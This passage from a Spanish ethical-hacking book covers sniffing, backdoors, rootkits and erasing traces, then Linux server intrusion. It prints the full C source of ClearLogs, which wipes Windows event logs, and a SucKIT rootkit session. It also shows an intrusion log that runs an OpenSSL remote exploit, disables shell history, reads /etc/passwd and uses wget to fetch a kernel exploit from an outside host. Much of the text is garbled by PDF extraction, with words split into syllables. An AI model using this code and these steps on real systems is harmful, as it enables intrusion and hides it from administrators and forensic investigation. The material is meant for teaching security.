El ata can te rea li za rá snif fing en su in ten to por in ter cep tar trá fi co de red: con tra -se ñas, do cu men tos o con te ni dos de e-mails con strings, co mo con tra se ña, tar je -ta de cré di to, de pó si to, usua rio, ho me ban king o plan. Ade más, con la prác ti cade no mi na da key log ging, in ten ta rá re co lec tar to do aque llo que el ad mi nis tra doro los usua rios ti peen en el ob je ti vo com pro me ti do y lo al ma ce na rá de mo do se -cre to o se lo en via rá por e-mail pa ra su pos te rior aná li sis. La pri me ra téc ni ca es -tá orien ta da al trá fi co de red (trán si to de pa que tes), mien tras que la se gun da es -tá des ti na da a com pro me ter ter mi na les de tra ba jo a tra vés de un dis po si ti vo I/Oco mo el te cla do. Me dian te am bas téc ni cas el in tru so pue de con se guir pass wordsque le per mi ti rán lo grar ac ce so co mo un usua rio va li da do y así ob te ner in for ma -ción pa ra su pos te rior uso.El snif fing se da en la ca pa de en la ce del mo de lo OSI y se uti li zó en un prin ci piopa ra de tec tar pro ble mas de trá fi co en re des (cue llos de bo te lla), pe ro se ter mi nóem plean do tam bién pa ra es piar trá fi co en trán si to, más pre ci sa men te da tos e in for -ma ción sen si ble. Cuan do ha bla mos de snif fing, se uti li zan dos tér mi nos:

• Snif fing pa si vo: Es aquel mo do en el que se in ter cep ta y se lee trá fi co de red atra vés de una pla ca de red –in ter faz- en mo do pro mis cuo (ap ta pa ra que los pa -que tes de otras má qui nas de la red pa sen por ahí y sean cap tu ra dos) sin mo di fi -car el trá fi co. És te es el ca so cuan do un ser vi dor de co rreo es com pro me ti do por -que se le ins ta la ds niff, y és te gra ba to dos los lo gins de los clien tes POP3 que se

217

Hacking Etico - [PDF Document] (221)

co nec tan al mis mo ser vi dor.• Snif fing ac ti vo: Es aquel mo do en el que se lo gra el snif fing a tra vés de otra téc -ni ca co mo, por ejem plo, el en ve ne na mien to de ca ché (ARP Ca che Poi so ning) pa raque, me dian te un en ga ño, el trá fi co de de ter mi na da má qui na sea re di rec cio na dopor otra ha cia la nues tra. De ese mo do, el trá fi co es cap tu ra do y ana li za do. Es tosu ce de ría en el es ce na rio de una red lo cal y se da en la téc ni ca que se co no ce co -mo man in the midd le. Po de mos rea li zar lo muy fá cil men te so bre sis te mas Win -dows en una red LAN con la apli ca ción Cain. En ww w.i ron geek .com /vi deos -/cai n1.a vi, po de mos ver un vi deo.

Pa ra pro bar el gra do de vul ne ra bi li dad de nues tros equi pos y así evi tar el in gre sode in tru sos o el ro bo de da tos, en los si guien tes si tios po de mos en con trar he rra -mien tas pa ra lle var a ca bo las prue bas de es te ti po de téc ni cas: ww w.o xi d.it -/cain.html, htt p://et ter cap .sour ce for ge .net y www .mon ke y.org /~dug -song/ds niff/.

218

Exis te una he rra mien ta de Mi cro soft que nos per mi te de tec tar in ter fa ces en mo do pro -mis cuo. Es ta he rra mien ta es gra tui ta, se lla ma promqry y la po de mos des car gar dehttp ://sup port .mi cro soft .com/k b/892853/es, don de ade más en con tra re mos in for ma -ción so bre có mo uti li zar la y sus ca rac te rís ti cas.

He rra mien ta de Mi cro soft

Hacking Etico - [PDF Document] (222)

Intercepción. Wi res hark es un pro yec to que se ini ció ha ce diez años y quees uti li za do pa ra la cap tu ra y el aná li sis de pa que tes de da tos (o ana li za dor

de pro to co los de red). Po de mos ba jar lo pa ra su tes teo des de www .wi res har k.org.

Plan tar back doors o puer tas tra se ras

Si el in tru so tie ne in te rés de vol ver a en trar en el fu tu ro, va a ins ta lar back doors.Ade más, pue de ce rrar la puer ta por don de en tró (mi ti gar la vul ne ra bi li dad) pa ra queotros in tru sos me nos há bi les no lo gren en trar, ya que de ese mo do to dos ter mi na -rían sien do des cu bier tos por el ad mi nis tra dor a car go del sis te ma o del ser vi dor. Lafi na li dad de ins ta lar el back door es vol ver a in gre sar y ha cer uso de los re cur sos deun mo do más lim pio, sin de jar tan to ras tro, es de cir, no tan ex pues to co mo cuan -do rea li zó la eta pa ini cial de ata que.Hay mu chas for mas de rea li zar el back doo ring. És te se pue de lle var a ca bo a tra vés de:

• Un ser vi cio na ti vo del sis te ma ope ra ti vo co mo puer ta tra se ra: un ser ver Tel net,FTP o Ter mi nal Ser vi ce co rrien do en di fe ren te puer to se tea do des de el mis mo re -gis tro de Mi cro soft Win dows. Es to tie ne co mo ven ta ja que nun ca se rá ca ta lo ga doco mo mal wa re por los an ti vi rus ni de tec ta do por una he rra mien ta an tispy wa re.• Un ad mi nis tra dor re mo to co mo VNC, Pcanyw he re, Rad min, et cé te ra.• De jar una shell en asp o php (u otro len gua je de pro gra ma ción) ocul ta en un si -tio del ser vi dor. • Reem pla zar una apli ca ción nue va por una ver sión an te rior que sea vul ne ra ble.• Mo di fi car una apli ca ción pre sen te pa ra que an te de ter mi na da in yec ción de có di -go en el cam po de da tos per mi ta eje cu tar co man dos de sis te ma, fil tran do las in -yec cio nes más co mu nes.

• Ins ta lar una bot net: la má qui na ob je ti vo se co nec ta a tra vés de un en la ce a un ca -nal IRC en don de los usua rios que ten gan ac ce so allí po drán eje cu tar co man dosdes de el mis mo ca nal de mo do re mo to y anó ni mo, tal co mo hoy se rea li zan la ma -yo ría de los ata ques DDoS. És te es un mé to do pa ra na da su til, pe ro aún se uti li -

219

Si nos in te re sa apren der téc ni cas re la cio na das con la ma ni pu la ción de pa que tes, esre co men da ble prac ti car con las si guien tes uti li da des: Pac kit (www .pac ket fac tory .net -/pro jects /pac kit/), hping2 (www.h pin g.org/h ping 2.win 32.tar.gz), Scapy (www .sec de -v.org /pro jects/s capy/), Ne me sis (http ://ne me sis .sour ce for ge .net).

Uti li da des pa ra ma ni pu lar pa que tes

Hacking Etico - [PDF Document] (223)

za.• Agre gar o ha bi li tar un usua rio des ha bi li ta do. • Lin kear una shell o prompt con pri vi le gio Sys tem. En http ://blog .di diers te -vens .com /2006/08/21/pla ying-with-util ma ne xe/, po de mos ver un mé to domuy in ge nio so. • Co lo car net cat co mo ser vi cio en una ta rea pro gra ma da pa ra que, a de ter mi na daho ra en de ter mi na do día, ini cie una shell lo cal en el ser vi dor o se co pie a la car -pe ta /Scripts del web ser ver IIS.• Mo di fi car un script pa ra lo grar su bir un ar chi vo a un path que se ha he cho eje -cu ta ble.• Pro gra mar una ta rea pa ra que un de ter mi na do día se agre gue un usua rio del gru -po ad mi nis tra dor y que a de ter mi na da ho ra se bo rre jun to a los logs de sis te ma.• Ins ta lar un root kit que po sea pro pie da des de back door. Por ejem plo, uno muy lo -gra do es Suc kit (www.ph rac k.or g/is sues.htm l?is sue=58&i d=7#ar ti cle), quepue de es con der ar chi vos, pro ce sos y co ne xio nes, gra bar las pass words ti pea dasde co ne xio nes SSH y no abrir puer tos en el ob je ti vo. Fue uti li za do en la fa mo sain tru sión a los ser vi do res de los de sa rro lla do res de De bian GNU /Li nux. Acon ti nua ción, ve mos un log de co ne xión que les generé de muestra:

sh-2.05# ./lo gin -h 200.00.xx (Suc KIT po see un clien te pa ra la co ne xión)[===== Suc KIT ver sion 1.3a, Oct 13 2005 <http://sd.g-art.nl/sk> =====][====== (c)o ded by sd <sd@c di.cz> & de vik <de vik@c di.cz>, 2002 ======]Lis te ning to port 37552pass word: Tr ying 200.00.00.00:53...con nect: Con nec tion re fu sedTr ying 200.00.00.00:79...con nect: Con nec tion re fu sedTr ying 200.00.00.00:110... Tr yin g...Et voi la (conectado al puerto de pop3 on the fly)Ser ver con nec ted. Es ca pe cha rac ter is ‘^K’

220

En el bus ca dor www.bt mon .com, po de mos en con trar ma te rial pa ra es tu diar la fa mi lia depro to co los TC P/IP. Ade más, es muy con ve nien te leer el tra ba jo de Gui llem Cam pos Le -do, lla ma do De bi li da des de TC P/IP, que en con tra mos en htt p://a sig na tu ras .dia te l.up -m.es /se gu ri dad /tra ba jos/.

TC P/IP

Hacking Etico - [PDF Document] (224)

[===== Suc KIT ver sion 1.3a, Nov 28 2005 <http://sd.g-art.nl/sk> =====][====== (c)o ded by sd <sd@c di.cz> & de vik <de vik@c di.cz>, 2002 ======][roo t@lab /]# w (aqui ya es ta mos co mo root en la ma qui na ob je ti vo) 04:55:53 up 19 days, 10:32, 0 users, load ave ra ge: 0.00, 0.02, 0.05

USER TTY FROM LO GIN@ ID LE JC PU PC PU WHAT

Tro ya nos bi na rios y de ker nel

El in tru so ins ta la rá tro ya nos bi na rios y de ker nel pa ra di si mu lar su pre sen cia, a tra -vés del ocul ta mien to de los pro ce sos que ge ne ra y de las he rra mien tas que man tie -ne fun cio nan do den tro del ser vi dor. Un ejem plo de es to son los snif fers, es cá ne resde red o crac kea do res de con tra se ñas ci fra das, que ge ne ral men te for man par te deun root kit. La fi na li dad de usar es tas uti li da des es la de no ser des cu bier to.En Win dows es bas tan te fá cil di si mu lar un pro ce so por que bas ta con re nom brar elar chi vo del ata can te pa ra de no mi nar lo sv chos t.e xe. Así, és te pa sa rá de sa per ci bi doal ver lo eje cu ta do en el Task Ma na ger (que apa re ce al pre sio nar Cr tl+Alt +Del), esde cir, apa re ce rá co mo si fue ra un pro ce so del sis te ma. Tie ne que ser un in tru so muydes cui da do co mo pa ra que al ad mi nis tra dor del ser vi dor le lla me la aten ción la can -ti dad de re cur sos de CPU que ese ar chi vo con su me y que en ese mo men to tra te dever si es el ar chi vo na ti vo de Win dows u otro. Sp yA gent (un po de ro so mo ni tor pa -ra Win dows) uti li za, por ejem plo, el nom bre de ar chi vo sv chos t.e xe y, en su úl ti maver sión, no es de tec ta do por los an ti vi rus.

En Li nux, el me ca nis mo es di fe ren te. Aquí pue den ocul tar se me dian te la ins ta la -ción de una ver sión tro ya ni za da del bi na rio. ¿Qué sig ni fi ca es to? Su pon ga mos queun ad mi nis tra dor Li nux de sea lis tar los pro ce sos del ser vi dor por que sos pe cha al -go. Se gu ra men te, eje cu ta rá los co man dos ps y lsof. Cuan do el in tru so los tro ya ni -za, reem pla za esos ar chi vos por otros que, al ser eje cu ta dos, no lis ta rán o mos tra -rán las uti li da des del in tru so que fue ron eje cu ta das. Es tos pro ce sos fan tas mas e in -vi si bles es ta rán de fi ni dos en un ar chi vo de con fi gu ra ción en esos bi na rios tro ya ni -za dos. Si el ad mi nis tra dor Li nux es me dio des con fia do, mi ra rá los bi na rios, pe ro si

221

Los root kits son kits (en ar chi vos o en có di go) que usan los in tru sos co mo in ten to deper pe tuar su es ta día en los sis te mas, ocul tán do se y ge ne ran do una vía tra se ra de in -gre so. En www .root kit .com, po de mos en con trar una co lec ción de és tos, ade más de fo -ros, no tas in te re san tes y nue vos de tec to res de mal wa re.

Root kit

Hacking Etico - [PDF Document] (225)

el in tru so es lis to, uti li za rá el co man do touch –r pa ra dar les la mis ma fe cha y ho raque al res to de los ar chi vos, y así los ha rá pa sar co mo si fue ran ori gi na les. La úni -ca for ma de de tec tar los se ría ha cien do una com pro ba ción del ti po check sum de losbi na rios o pa sán do le al ser vi dor un an ti root kit co mo ch kroot kit (www.ch kroot ki -t.org /down load/), con el que se po drá des cu brir que tan to ps co mo lsof son tro -ya nos que ocul tan pro ce sos del in tru so al ser eje cu ta dos.Tam bién pue den tro ya ni zar se ser vi cios co mo SSH, Tel net o Rlo gin que, al en trar conde ter mi na do co man do o usua rio, dan una shell root en el sis te ma. Hoy en día, haymu chos ar chi vos tro ya ni za dos de es te ti po (no ha bla mos de tro ya nos co mo sub se -ven o net bus que só lo ser vían ha ce años pa ra in fec tar ter mi na les Win dows 95/98 yME). Otro ejem plo ocu rre cuan do el ad mi nis tra dor quie re ver ar chi vos a tra vés delos me dios nor ma les de bús que da. Es muy pro ba ble que el in tru so ha ya co lo ca dover sio nes tro ya ni za das de ls o find que al ser eje cu ta das no lis ta rán las he rra mien -tas o los ex ploits que tie ne ocul tos el in tru so en un di rec to rio de ese Li nux.

Cleaner. Si tio web del co no ci do bus ca dorde root kits en ser vi do res Li nux (www.ch kroot ki t.org).

Bo rrar ras tros

Si el vi si tan te que en tra sin au to ri za ción sa be lo que ha ce, tra ta rá de no de jar evi -

222

Hacking Etico - [PDF Document] (226)

den cia de su pa so por el sis te ma ope ra ti vo. Bo rrar ras tros se ría una ac ción muy bur -da en el ca so de que se re fie ra a la eli mi na ción de ar chi vos en te ros de re gis tros(C:\Win dows\Sys tem 32\Log Fi les\W3SVC1 pa ra el re gis tro del web ser ver IISen Win dows o /var /log pa ra re gis tros de sis te ma en Li nux). Eli mi nar el re gis trocompleto en un ser vi dor des per ta ría una fuer te sos pe cha de in tru sión en el per so -nal de ad mi nis tra ción de los ser vi do res, y el in tru so há bil lo sa be. Mo di fi car los logs(de ser vi cios, de apli ca cio nes, de usua rios y de sis te ma) es más su til que bo rrar losdi rec ta men te. Por eso, el in tru so bus ca rá su plan tar los da tos de los logs y ase gu rarel bo rra do se gu ro de los ar chi vos em plea dos en la in tru sión (wi pear).Ca be men cio nar que otras hue llas son te ni das en cuen ta: la mo di fi ca ción del ho ra -rio y la fe cha de un de ter mi na do fi che ro o di rec to rio ma ni pu la do por el ata can te,co mo por ejem plo el ar chi vo ssh _con fig o los his to ria les de co man dos eje cu ta dos.Ló gi ca men te, el fin de to do es to es no ser des cu bier to e im po si bi li tar el aná li sis delos ad mi nis tra do res so bre las ano ma lías en el sis te ma o en tor pe cer la pos te rior in -ves ti ga ción o aná li sis di gi tal fo ren se. Pa ra lo grar lo, el in tru so bus ca rá mo di fi car losre gis tros (logs) de ca da uno de los ser vi cios que lo ha ya re gis tra do, prin ci pal men teaque llos que han gra ba do los in ten tos des de afue ra y del pro pio sis te ma. Ade más,in ten ta rá eli mi nar las tra zas del usua rio que uti li zó pa ra ha cer co sas aden tro an tesde al can zar su má xi mo pri vi le gio.Exis te una for ma simple de cam biar la ubi ca ción de los logs de sis te ma en Win -dows. Pa ra eso, te ne mos que mo di fi car la cla ve de re gis tro en HKEY _LO CAL -_MA CHI NE\SYS TEM \Cu rrent Con trol Set \Ser vi ce s\E ven tlog.

223

En el si tio ww w.of fen si ve com pu ting .net, po de mos en con trar fo ros y ma te rial téc ni copa ra ana li zar, jun to a una co lec ción de he rra mien tas. Co mo tam bién hay mu cho có di -go ma li cio so, te ne mos que ser muy cui da do sos al com pi lar y eje cu tar al go que ha ya -mos ba ja do des de allí.

Ma te rial adi cio nal

Hacking Etico - [PDF Document] (227)

Clave. Aquí ve mos, en el re gis tro, des de dón de se cam bia el di rec to rioen el que se van a ge ne rar los ar chi vos .EVT (logs de even tos de sis te ma) de Win dows.

Por otro la do, es tos re gis tros pue den eli mi nar se vía lí nea de co man do de mu chas for -mas. Una de ellas es uti li zan do Clear Logs (www.nt se cu rity .nu /tool box /clear -logs/).

Llenos. Aquí ve mos la lis ta de ar chi vos de even tos en el di rec to rioC:\WIN DOWS\sys tem 32\con fig, que po de mos vol ver a ce ro con la uti li dad Clear Logs.

Si que re mos, tam bién po de mos com pi lar el có di go fuen te de Clear Logs con la he -

224

Hacking Etico - [PDF Document] (228)

rra mien ta DevCPP, un com pi la dor y en tor no de de sa rro llo C/C++ que po de mosdes car gar de http://pr down loads .sour ce for ge .net /dev-cpp /devcpp-4.9.9.2_se tu p.e xe. És te es un edi tor in te gra do con un com pi la dor que nos per mi ti rá ha cer la com pi -la ción y la eje cu ción de apli ca cio nes. Es ideal pa ra com pi lar ex ploits y otros bi na -rios pa ra usos de tes teo. Des pués de ins ta lar lo, va mos al me nú Ar chi vo /Nue -vo/Ar chi vo Fuen te y pe ga mos el si guien te có di go fuen te:

#in clu de <st dio.h>#in clu de <std lib.h>#in clu de <strings.h>#in clu de <win dows.h>

void Usa ge (char buf fer[]);

int mai n(int argc ,char *argv[]){if(argc!=2){

Usa ge(argv[0]);

re turn EXIT _FAI LU RE;}

HAND LE hLog;if(strcm p(argv[1],”-app”)==0){

if((h Lo g=O pe nE ven tLog (NULL ,”Ap pli ca tion ”))!=NULL){

Clea rE ven tLog(h Log ,NULL);Clo seE ven tLog(h Log);print f(“Ap pli ca tion log clea red suc cess fully.”);re turn EXIT _SUC CESS;

}re turn EXIT _FAI LU RE;

}el se if(strcm p(argv[1],”-sec”)==0){

if((h Lo g=O pe nE ven tLog (NULL ,”Se cu rity ”))!=NULL){

225

Hacking Etico - [PDF Document] (229)

Clea rE ven tLog(h Log ,NULL);

Clo seE ven tLog(h Log);printf (“Se cu rity log clea red suc cess fully.”);re turn EXIT _SUC CESS;

}

re turn EXIT _FAI LU RE;}

el se if(strcm p(argv[1],”-sys”)==0){

if((h Lo g=O pe nE ven tLog (NULL,”Sys tem ”))!=NULL){

Clea rE ven tLog(h Log ,NULL);Clo seE ven tLog(h Log);printf(“Sys tem log clea red suc cess fully.”);re turn EXIT _SUC CESS;

}re turn EXIT _FAI LU RE;

}Usa ge(argv[0]);

re turn EXIT _FAI LU RE;}

//the Usa ge Func tionvoid Usa ge (char buf fer[]){

printf (“Clear Logs v1.1 writ ten by Whi te Scor pion (C)2005\n”);printf(“********* http://www.w hi te-scor pion.nl *********\n\n”);printf(“ Ba sed on the idea from ill will\n\n\n”);print f(“A pro gram that can clear the Win dows even tlogs.\n\n”);print f(“U sa ge:\n”);printf(“%s -app\t (clears ap pli ca tion even tlog).\n ”,buf fer);printf(“%s -sec\t (clears se cu rity even tlog).\n ”,buf fer);printf(“%s -sys\t (clears sys tem even tlog).\n ”,buf fer);

}

A con ti nua ción, lo com pi la mos des de Eje cu tar /Com pi lar y lue go eje cu ta mos el ar -

226

Hacking Etico - [PDF Document] (230)

chi vo bi na rio (.exe) que se crea en el mis mo di rec to rio en el que guar da mos el fuen -te. Por otro lado, les cuento que exis ten otras he rra mien tas que poder lle var a ca -bo el bo rra do se gu ro de ar chi vos en Win dows, co mo por ejem plo Wi pe (www.my -pla net soft .com /free /wi pe.php). Otra he rra mien ta muy útil es Sh redCL, que uti -li za mos si ne ce si ta mos bo rrar de mo do se gu ro –irre cu pe ra ble– un ar chi vo que con -tie ne, por ejem plo, la ta rea batch de lo guear se vía FTP a una shell nues tra pa ra ba jar unar chi vo (re cor de mos el co man do ftp –s:e.txt). Es ta uti li dad la po de mos des car gar dewww.w hi te-scor pion.nl /pro grams/sh red der .zip.

Compilando. Aquí es ta mos crean do el ar chi vo eje cu ta ble des de el có di go fuen tede Clear Logs. Es ta téc ni ca nos ser vi rá pa ra com pi lar, de pu rar, op ti mi zar y apren der

mu cho más acer ca de los có di gos fuen te y el mé to do de pro gra ma ción de sus au to res.

Al eje cu tar nues tro pro gra ma, ve re mos lo si guien te:

Clear Logs v1.1 writ ten by Whi te Scor pion (C)2005

Usa ge:clear log -app (clears ap pli ca tion even tlog).clear log -sec (clears se cu rity even tlog).clear log -sys (clears sys tem even tlog).

C:\>clear log -app

227

Hacking Etico - [PDF Document] (231)

Ap pli ca tion log clea red suc cess fully.

C:\>clear log -secSe cu rity log clea red suc cess fully.

C:\>clear log -sys

Sys tem log clea red suc cess fully.

Esta bien claro en esta salida de pantalla como se han ido borrando uno a unolos registros de sistema, tanto de aplicaciones, como de seguridad y sistemas.

228

Hacking Etico - [PDF Document] (232)

229

Hacking Etico - [PDF Document] (233)

230

Intrusión. Uno de los tantos incidentes que ocurren a diario en el país y el mundo.

Hacking Etico - [PDF Document] (234)

8 > ServidoresLinux

Aquí veremos cómo es el proceder de un

atacante real dentro de un servidor Linux.

Qué busca, cómo se oculta de la mirada de

los administradores, cómo coloca backdoors o

captura contraseñas de la organización,

entre otras cosas. Además, conoceremos

algunas contramedidas muy eficientes basadas

en hardening aplicadas tanto al núcleo, como

a los servicios de este sistema operativo.

Hacking Etico - [PDF Document] (235)

IntroducciónUn sistema puede ser 100% seguro. Durante días o minutos.

¿Cuál es más seguro utilizado como servidor? ¿Linux o Windows? Todo dependede la dedicación que le brinde su administrador o responsable en cuanto a su con-figuración, control, y el hardening aplicado. Un sistema instalado por defecto pues-to en producción es un sistema descuidado, en riesgo. Entonces, tanto uno comootro, al estar descuidados, son altamente vulnerables.¿Por qué se dice que Linux es el sistema operativo preferido de los intrusos más pre-parados? Es dinámico, es simple si se lo conoce bien y permite hacer muchas cosas alutilizar su consola de comandos, un editor de textos y un puñado de aplicacionespreinstaladas en el mismo sistema. Es libre (no gratuito) y similar a la plataforma ob-jetivo en la mayoría de los casos. La versatilidad que ofrece y la amplia gama de situa-ciones y soluciones que pueden darse a través de éste lo hacen una herramienta muyamena y provechosa. Todo esto sin contar, además, sus características técnicas de por-tabilidad (se puede instalar en máquinas viejas desde un simple disquette de booteo),la posibilidad de modificación de su código fuente o del stack TCP/IP (no está limi-tado como Windows XP), de su plataforma de programación o de la interacción conel usuario a través de comandos shell que van desde lo más simple hasta lo más com-plejo.

Distro. CentOS (www.centos.org) es una distribución de Linux basadaen el código fuente liberado de Red Hat. Actualmente es bastante utilizado en

empresas para compartir recursos a modo de servidor. Podemos descargar la guía deseguridad para Centos desde www.linux-books.us/download.php?f=cos_security_guide.zip.

232

Hacking Etico - [PDF Document] (236)

Hoy, más que nunca, se encuentra al alcance de todos debido a lo fácil de su instala-ción, a su amigable interfaz gráfica (como KDE o Gnome) y al mantenimiento de pa-quetes mediante actualizaciones a través de algunos simples comandos. Veamos cómose instala paso a paso un buscador de vulnerabilidades como Nessus en esta platafor-ma.

Nessus en Debian GNU/Linux 4.0

Trabajar desdeNessus, instalado enunaplataformaLinux comoDebian 4.0, esmás fácil y ge-nera menos inconvenientes que si se lleva a cabo desde una terminal con Windows XP. Allíno tendremos que lidiar con el firewall de éste ni con su limitado stack TCP/IP gracias al Ser-vice Pack 2, entre otras cosas propias de ese sistema operativo orientado a usuarios de escritorio.

Reporte. En esta pantalla, vemos el resultado delescaneo de un host con la última versión de Nessus, mostrando

un listado de vulnerabilidades (en este caso la lista de los usuarios de unservidor Windows), información que luego podrá ser exportada a un reporte.

Para instalarlo, en primer lugar debemos ir a la sección Download del sitio deNessus (www.nessus.org). Luego aceptamos el contrato de licencia y colocamosnuestros datos personales en el formulario. Cuando terminamos de descargar elpaquete para Linux Debian, ejecutamos:

233

Hacking Etico - [PDF Document] (237)

lab:/tmp# dpkg -i Nessus-3.2.0-debian4_i386.debSeleccionando el paquete nessus previamente no seleccionado.(Leyendo la base de datos ...80926 ficheros y directorios instalados actualmente.)Desempaquetando nessus (de Nessus-3.2.0-debian4_i386.deb) ...Configurando nessus (3.2.0) ...nessusd (Nessus) 3.2.0. for Linux(C) 1998 - 2008 Tenable Network Security, Inc.

Processing the Nessus plugins...

[##################################################]

All plugins loaded

- Please run /opt/nessus/sbin/nessus-adduser to add an admin user- Register your Nessus scanner at http://www.nessus.org/register/ to obtain

all the newest plugins- You can start nessusd by typing /etc/init.d/nessusd start

A continuación, procedemos a registrar Nessus con el serial que ha llegado a la di-rección de correo que ingresamos en el formulario de registro.

lab:/tmp# /opt/nessus/bin/nessus-fetch —register E036-D328-CBB7-BFF2-DC28

Your activation code has been registered properly - thank you.Now fetching the newest plugin set from plugins.nessus.org...Your Nessus installation is now up-to-date.If auto_update is set to ‘yes’ in nessusd.conf, Nessus willupdate the plugins by itself.

234

Si queremos aumentar nuestros conocimientos, una buena opción es estudiar el ma-terial de las certificaciones dedicadas, como el que encontramos en www.testout.com-/linuxplus/ y las guías de administración como las que hay en www.oreilly.com/pub/to-pic/linux.

Material de estudio

Hacking Etico - [PDF Document] (238)

Se nos comunica que tenemos la herramienta registrada y la database de plugins ac-tualizada al día de la fecha. Entonces, damos de alta un usuario que será el autori-zado para que el cliente se conecte al servidor en modo autentificado:

lab:/tmp# /opt/nessus/sbin/nessus-adduserUsing /var/tmp as a temporary file holder

Add a new nessusd user———————————

Login : auditoriaAuthentication (pass/cert) [pass] :Login password :Login password (again) :

User rules—————nessusd has a rules system which allows you to restrict the hoststhat pentest has the right to test. For instance, you may wanthim to be able to scan his own host only.

Please see the nessus-adduser(8) man page for the rules syntax

Enter the rules for this user, and hit ctrl-D once you are done :(the user can have an empty rules set)

Login : auditoriaPassword : ***********DN :Rules :

Is that ok ? (y/n) [y] yuser added.

Después de agregar el usuario correctamente, bajamos el cliente que correspondedel sitio de Nessus, siguiendo los mismos pasos que para el server. En este caso,elegimos Debian. Luego de bajarlo, lo instalamos con el comando lab:/tmp#dpkg –i NessusClient-3.2.0-debian4_i386.deb y, cuando se termina de instalar,lo ejecutamos con lab:/tmp# /opt/nessus/bin/NessusClient.

235

Hacking Etico - [PDF Document] (239)

Primera. Aquí, el cliente nos pregunta si nos queremos conectar al servidor.Eligiendo la opción Yes, éste se conectará a través del usuario configurado y podremos

setear las políticas y modos de búsqueda de vulnerabilidades para cada objetivo.

Acciones del intruso

Antes de conocer más acerca de los actos usuales (dentro de los diversos patro-nes de conducta en intrusos), cabe aclarar que todas las técnicas que desarrolla-mos en los capítulos previos son aplicables a un servidor Linux para comprome-terlo. Sólo cambian los comandos y las herramientas, pero la intención o accionares el mismo.

236

El escáner Nmap no viene más junto a Nessus. Si deseamos utilizarlo junto a éste deforma conjunta, debemos dirigirnos a www.nessus.org/documentation/index.php-?doc=nmap-usage para obtener información y a www.nessus.org/documentation/n-map.nasl para descargarlo.

Nmap

Hacking Etico - [PDF Document] (240)

Estudio. Este es un curso brindado por los creadores deBacktrack, llamado Offensive Security 101. Es realizado online en

un entorno real (laboratorio) en el que se llevan a cabo prácticas contraservidores vulnerables. Más información en www.offensive-security.com.

Claramente, nos vamos a encontrar con situaciones particulares por la diferencia de laplataforma (como extraer información acerca de los usuarios existentes a través de losservicios ident, finger, sendmail, samba, snmp, desde aplicaciones como Apache,o bien databases como Oracle y MySQL). Los ataques siempre van a ser dirigidoshacia:

• El factor humano involucrado: al descuido o error de administración o progra-mación, en un contexto de trabajo (recursos del administrador, e-mail), dirigidosal escenario personal de algún componente (e-mail del gerente de sistemas, due-ño de la compañía o cualquier empleado que manejara información de la admi-nistración).

237

Sistema de firewall, que se utiliza tanto como para el filtrado de paquetes (por endeconexiones) como para hacer NAT en una red. Recomiendo como lectura basica elclaro documento: Iptables Manual Practico por Xabier Pello (googlear), unadministrador dedicado. Pagina oficial de la he- rramienta: www.netfilter.org

IPTABLES

Hacking Etico - [PDF Document] (241)

• Al sistema operativo o sus servicios: Vulnerabilidades presentes en servicios,mecanismos de autentificación.

Distro. Operator 3.3 es una distribución de seguridad(live CD) basada en Debian GNU/Linux. Tiene más de 100 exploits

y 900 utilidades para ejecutar. Su página es www.ussysadmin.com/operator.

• Dirigido a las aplicaciones: Vulnerabilidades o descuidos.• A la red y sus protocolos: Vulnerabilidades en implementaciones que involu-

cren a la familia TCP/IP o protocolos que transporten información sensible entexto plano, como también aquellos criptosistemas (tramos de red con transmi-sión cifrada entre puntos) que cuenten con un algoritmo de cifrado débil.

• Al entorno u objeto débil en el resto del escenario: Componentes perimetrales.• Plano físico: Dumpster diving (trashing, buscar basura), entrar en el datacenter,

sentarse frente a la terminal, hurgar cajones, fotografiar documentos o pizarras, et-cétera.

Dentro de la shell

El intruso, una vez que consiguió una cuenta dentro del servidor (con el método otécnica que hayamos detallado antes, o una mezcla de ellas), lo primero que va a in-tentar siempre es obtener el máximo privilegio de cuenta.Veamos un claro ejemplo de salida de pantalla. En este caso, el intruso ejecuta un

238

Hacking Etico - [PDF Document] (242)

exploit remoto para la falla OpenSSL+Apache hacia el objetivo con resultado po-sitivo. Una vez adentro, ejecuta un exploit de kernel y se convierte en root.

bash-2.04# ./solar 0x1a 200.xxx.100.24 -c 30: openssl-too-open.c - OpenSSL remote apache exploit

by Solar Eclipse <[emailprotected]>

: Private 0dd code.

Opening connections... 30 of 30Establishing SSL connectionSession:0000 - c0 da ab cb 39 39 43 1f 7f 51 08 2a 37 4f fe de0010 - 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 000020 - 20 00 00 00 63 64 32 36 63 36 32 30 65 35 32 350030 - 62 34 37 63 62 36 30 31 37 38 39 32 62 64 66 630040 - 37 39 63 32 00 00 00 00 b8 62 12 08 00 00 00 000050 - 00 00 00 00 01 00 00 00 2a 01 00 00 56 17 e5 3d0060 - 00 00 00 00 ac 14 32 40 00 00 00 00 58 62 12 080070 -cipher: 0x403214ac ciphers: 0x8126258Ready to send shellcodeSpawning shell...bash: no job control in this shellbash-2.04$bash-2.04$ unset HISTFILE; uname -a; id; echo ‘Welcome master!’Linux localhost.domain 2.2.17-14cl #1 qui nov 2 00:24:54 EST 2000 i686 unknownuid=65534(nobody) gid=65534(nobody) groups=65534(nobody)Welcome master! (todo esto se ejecuta de modo automatico)bash-2.04$bash-2.04$ cat /etc/passwd - El intruso mira (aun sin privilegios)

239

Si deseamos tener un documento de referencia para conocer los comandos Linux, po-demos encontrar uno muy recomendable en la dirección http://personal.auna.com-/discopix/comandos.pdf. En él tendremos los comandos muy bien organizados y agru-pados por categorías.

Comandos Linux

Hacking Etico - [PDF Document] (243)

el archivo de cuentascat /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:daemon:x:2:2:daemon:/sbin:adm:x:3:4:adm:/var/adm:lp:x:4:7:lp:/var/spool/lpd:sync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:news:x:9:13:news:/var/spool/news:/bin/bashqmails:x:75:235::/var/qmail:/bin/trueqmaillog:x:76:235::/var/log:/bin/trueetc

bash-2.04$ cd /tmp - Va hacia el directorio /tmpcd /tmpbash-2.04$ wget http://xxxxx/epcs2.c - Baja un exploit local de kernelwget http://xxxxx/epcs2.c—16:06:05— http://xxxxx/epcs2.c

=> `epcs2.c’Connecting to xxxxx:80... connected!HTTP request sent, awaiting response... 200 OKLength: 5,001 [text/plain]

0K .... 100% 0:00 1.00M

16:06:05 (976.76 KB/s) - `epcs2.c’ saved [5001/5001]

